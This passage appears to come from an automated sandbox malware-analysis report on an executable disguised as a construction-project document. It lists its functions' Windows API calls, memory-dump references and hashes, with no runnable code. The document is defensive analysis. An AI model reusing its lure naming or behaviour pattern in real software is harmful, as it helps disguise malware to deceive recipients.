                                                                                                                          • Instruction Fuzzy Hash: DD713471D04228DFDF28CF98C844BADBBB1FB48305F25806AD856BB291C7389996DF54
                                                                                                                          Function 004068EA Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9b7cba6587137bac62e94bd95232145a4a4e4cea60c39cf1103777a64c0d5ae0
                                                                                                                          • Instruction ID: b46b7f647ddddaa837b295bcbfdf8fe32b4b15f5abab45eff4fbfa9538c7bc71
                                                                                                                          • Opcode Fuzzy Hash: 9b7cba6587137bac62e94bd95232145a4a4e4cea60c39cf1103777a64c0d5ae0
                                                                                                                          • Instruction Fuzzy Hash: E7712371D04228DFEF28CF98C844BADBBB1FB44305F25806AD856BB291C7789A56DF44
                                                                                                                          Function 00403062 Relevance: 4.6, APIs: 3, Instructions: 95fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                                          • WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,?,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$PointerWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 539440098-0
                                                                                                                          • Opcode ID: 5ffa5ab8b8b542d2bf29b319ea7dfd3044dae09937863daa4ca41a6163888e30
                                                                                                                          • Instruction ID: ec1369f47cd2415d1f2b24c1eb1a058245e4710fa78a4886d9d776da59196917
                                                                                                                          • Opcode Fuzzy Hash: 5ffa5ab8b8b542d2bf29b319ea7dfd3044dae09937863daa4ca41a6163888e30
                                                                                                                          • Instruction Fuzzy Hash: B4314831504218EBDF10CF65ED45A9F3FB8EB09755F20807AF904AA1A0D3349E40DBA9
                                                                                                                          Function 00401F98 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 00401FC3
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                                            • Part of subcall function 00405234: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000), ref: 0040528F
                                                                                                                            • Part of subcall function 00405234: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll), ref: 004052A1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 00401FD4
                                                                                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,00000001,?), ref: 00402051
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 334405425-0
                                                                                                                          • Opcode ID: a4a7b2ccd0e98f0921e657f91edebe8813d2c583a05dee18c22fa0c78d0b05c4
                                                                                                                          • Instruction ID: cb7cdab3b881820b07126fe4dd0a8ef97d4a76ab9142fcea15e567a1f9a0c19a
                                                                                                                          • Opcode Fuzzy Hash: a4a7b2ccd0e98f0921e657f91edebe8813d2c583a05dee18c22fa0c78d0b05c4
                                                                                                                          • Instruction Fuzzy Hash: FF21C571904215F6CF206FA5CE48ADEBAB4AF04358F70817BF600B51E0D7B98E41DA6E
                                                                                                                          Function 004057CC Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405BD3: GetFileAttributesW.KERNELBASE(?,?,004057D8,?,?,00000000,004059AE,?,?,?,?), ref: 00405BD8
                                                                                                                            • Part of subcall function 00405BD3: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405BEC
                                                                                                                          • RemoveDirectoryW.KERNEL32(?,?,?,00000000,004059AE), ref: 004057E7
                                                                                                                          • DeleteFileW.KERNELBASE(?,?,?,00000000,004059AE), ref: 004057EF
                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405807
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1655745494-0
                                                                                                                          • Opcode ID: 149232c8aad9f1b3775c6dd716a29c2aaafc945b621f2dfd4840630b3c941ba6
                                                                                                                          • Instruction ID: bd6d4a3e3c8ae2539ca812546755b4e3e529903dede2fe37ad8455e2da4e9ad8
                                                                                                                          • Opcode Fuzzy Hash: 149232c8aad9f1b3775c6dd716a29c2aaafc945b621f2dfd4840630b3c941ba6
                                                                                                                          • Instruction Fuzzy Hash: D4E02B3250DA9096C35067349C08B5F3AD8DF86314F14493AFD52F21D0E37855469ABF
                                                                                                                          Function 004023E0 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000002F6,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nszA07E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3677997916-0
                                                                                                                          • Opcode ID: 6c7d1f518fbb7cdee12c91c7a30429344cb31e91ff0c114b69db44f42e44e333
                                                                                                                          • Instruction ID: c5a1559a9846988044f9ea67ad03363f87a10785b4b958f0fd2e75887457cd98
                                                                                                                          • Opcode Fuzzy Hash: 6c7d1f518fbb7cdee12c91c7a30429344cb31e91ff0c114b69db44f42e44e333
                                                                                                                          • Instruction Fuzzy Hash: BB117371915205EEDF14CFA0C6889AFB7B4EF44359F20843FE042A72D0D7B85A41DB6A
                                                                                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850602802-0
                                                                                                                          • Opcode ID: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                                                                                          • Instruction ID: 092ce593f34d4cefb17b57a654468e4a57f6b0d243feea45f1431905bdcf8400
                                                                                                                          • Opcode Fuzzy Hash: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                                                                                          • Instruction Fuzzy Hash: 6F01F431B24210ABE7295B389C05B6A3698E710314F10863FF911F62F1DA78DC13CB4D
                                                                                                                          Function 004022D5 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000002F6,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseDeleteOpenValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 849931509-0
                                                                                                                          • Opcode ID: 77255f357ee36c0e17c9fba5f7ad704e0e223fd683348d0f5e4e34767849a248
                                                                                                                          • Instruction ID: 38b5be8bce117af921f4e5ecf87b48473febfbb911f594cd731ca38f4e60318c
                                                                                                                          • Opcode Fuzzy Hash: 77255f357ee36c0e17c9fba5f7ad704e0e223fd683348d0f5e4e34767849a248
                                                                                                                          • Instruction Fuzzy Hash: 30F06272A04210ABEB15AFF59A4EBAE7278DB44318F20453BF201B71D1D5FC5D028A7D
                                                                                                                          Function 0040156B Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ShowWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1268545403-0
                                                                                                                          • Opcode ID: 4e05bc348ce61fbea98004c31f477e713a946defa61b8302a115f041240983d3
                                                                                                                          • Instruction ID: 75f1c009598274424d440b05a3ad8c81c52a8946c909ad9098faf089b9281bcd
                                                                                                                          • Opcode Fuzzy Hash: 4e05bc348ce61fbea98004c31f477e713a946defa61b8302a115f041240983d3
                                                                                                                          • Instruction Fuzzy Hash: 2DE04FB2B101049BCB64CBA8ED808FEB7A5AB48314B60453FE902B3290C675AC11CF28
                                                                                                                          Function 00401DC7 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$EnableShow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1136574915-0
                                                                                                                          • Opcode ID: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                                                                                          • Instruction ID: 2c80559432ee8e8f64af81f0c0a70d483a1ba28b218ef0fe4a74e939514edfa0
                                                                                                                          • Opcode Fuzzy Hash: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                                                                                          • Instruction Fuzzy Hash: CEE08CB2B04104DBCB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C009A3E
                                                                                                                          Function 00405BF8 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,80000000,00000003), ref: 00405BFC
                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C1E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 415043291-0
                                                                                                                          • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                                          • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                                                                                          • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                                          • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                                                                                          Function 00405BD3 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,004057D8,?,?,00000000,004059AE,?,?,?,?), ref: 00405BD8
                                                                                                                          • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405BEC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                                                                                          • Instruction ID: fe29290311b7cb81c7d613108583476726ae082aee9c7ce991490029c956b0b8
                                                                                                                          • Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                                                                                          • Instruction Fuzzy Hash: 04D0C976908020ABC2102B28AE0889BBB65DB542717018B31FA65A22B0C7305C52DAA6
                                                                                                                          Function 100028A4 Relevance: 2.7, APIs: 2, Instructions: 156memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNELBASE(00000000), ref: 10002963
                                                                                                                          • GetLastError.KERNEL32 ref: 10002A6A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1968028222.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1968005131.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
